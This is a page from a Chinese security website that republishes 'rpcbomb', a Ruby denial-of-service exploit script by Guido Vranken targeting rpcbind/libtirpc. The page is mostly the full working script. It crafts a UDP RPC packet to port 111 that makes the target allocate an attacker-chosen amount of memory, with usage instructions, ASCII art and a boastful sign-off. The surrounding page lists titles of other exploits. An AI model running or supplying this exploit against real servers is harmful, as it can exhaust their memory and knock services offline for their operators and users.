首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 RPCBind / libtirpc - Denial of Service 来源：https://guidovranken.wordpress.com/ 作者：Vranken 发布时间：2017-05-09   #!/usr/bin/ruby # # Source: https://raw.githubusercontent.com/guidovranken/rpcbomb/fe53048af2d4fb78c911e71a30f21afcffbbf5e1/rpcbomb.rb # # By Guido Vranken https://guidovranken.wordpress.com/ # Thanks to Sean Verity for writing an exploit in Ruby for an earlier # vulnerability: https://www.exploit-db.com/exploits/26887/ # I've used it as a template.   require 'socket' def usage         abort "\nusage: ./rpcbomb.rb <target> <# bytes to allocate> [port]\n\n" end bomb = """                                ` + # ,                                    : @ @ @ @ @ @                      @ @ ; . + @ @ @ .       @ @                      @ @ @ @ @ `           @ @                                      . `   @ #                          ; @ @ @ . : @ @ @ @                        @ @ @ @ @ @ @ @ @ @ @ ;                      @ @ @ @ @ @ @ @ @ @ @ @ @ `                  @ @ @ @ @ @ @ @ @ @ @ @ @ @ :                # @ @ @ @ @ @ @ @ @ @ @ @ @ '                  @ @ @ @ @ @ @ @ @ @ @ @ @ @ @                . @ @ @ @ @ @ @ @ @ @ @ @ @ @ @                + @ @ @ @ @ @ @ @ @ @ @ @ @ @ @                + @ @ @ @ @ @ @ @ @ @ @ @ @ @ @                : @ @ @ @ @ @ @ @ @ @ @ @ @ @ @                  @ @ @ @ @ @ @ @ @ @ @ @ @ @ @                  @ @ @ @ @ @ @ @ @ @ @ @ @ @ ,                    @ @ @ @ @ @ @ @ @ @ @ @ @                      , @ @ @ @ @ @ @ @ @ @ @                          ` @ @ @ @ @ @ @ @ @                                , @ @ @ @ @       r p c b o m b        DoS exploit for *nix rpcbind/libtirpc.        (c) 2017 Guido Vranken.        https://guidovranken.wordpress.com/   """   puts bomb   if ARGV.length >= 2     begin         host = ARGV[0]         numBytes = Integer(ARGV[1])         port = ARGV.length == 3 ? Integer(ARGV[2]) : 111     rescue         usage     end       pkt = [0].pack('N')         # xid     pkt << [0].pack('N')        # message type CALL     pkt << [2].pack('N')        # RPC version 2     pkt << [100000].pack('N')   # Program     pkt << [4].pack('N')        # Program version     pkt << [9].pack('N')        # Procedure     pkt << [0].pack('N')        # Credentials AUTH_NULL     pkt << [0].pack('N')        # Credentials length 0     pkt << [0].pack('N')        # Credentials AUTH_NULL     pkt << [0].pack('N')        # Credentials length 0     pkt << [0].pack('N')        # Program: 0     pkt << [0].pack('N')        # Ver     pkt << [4].pack('N')        # Proc     pkt << [4].pack('N')        # Argument length     pkt << [numBytes].pack('N') # Payload       s = UDPSocket.new     s.send(pkt, 0, host, port)       sleep 1.5       begin         s.recvfrom_nonblock(9000)     rescue         puts "No response from server received."         exit()     end       puts "Allocated #{numBytes} bytes at host #{host}:#{port}.\n" +         "\nDamn it feels good to be a gangster.\n\n" else     usage end   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Gemalto SmartDiag Diagnosis To ·Veritas Netbackup 8.0 File Wri ·Crypttech CryptoLog Remote Cod ·LogRhythm Network Monitor - Au ·Safari 10.0.3 - 'JSC::CachedCa ·Oracle GoldenGate 12.1.2.0.0 - ·WordPress 4.6 - Unauthenticate ·wolfSSL 3.10.2 - x509 Certific ·Serviio PRO 1.8 DLNA Media Str ·ASUS Routers CSRF / Informatio ·Serviio PRO 1.8 DLNA Media Str ·Dolibarr 4.0.4 SQL Injection /   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved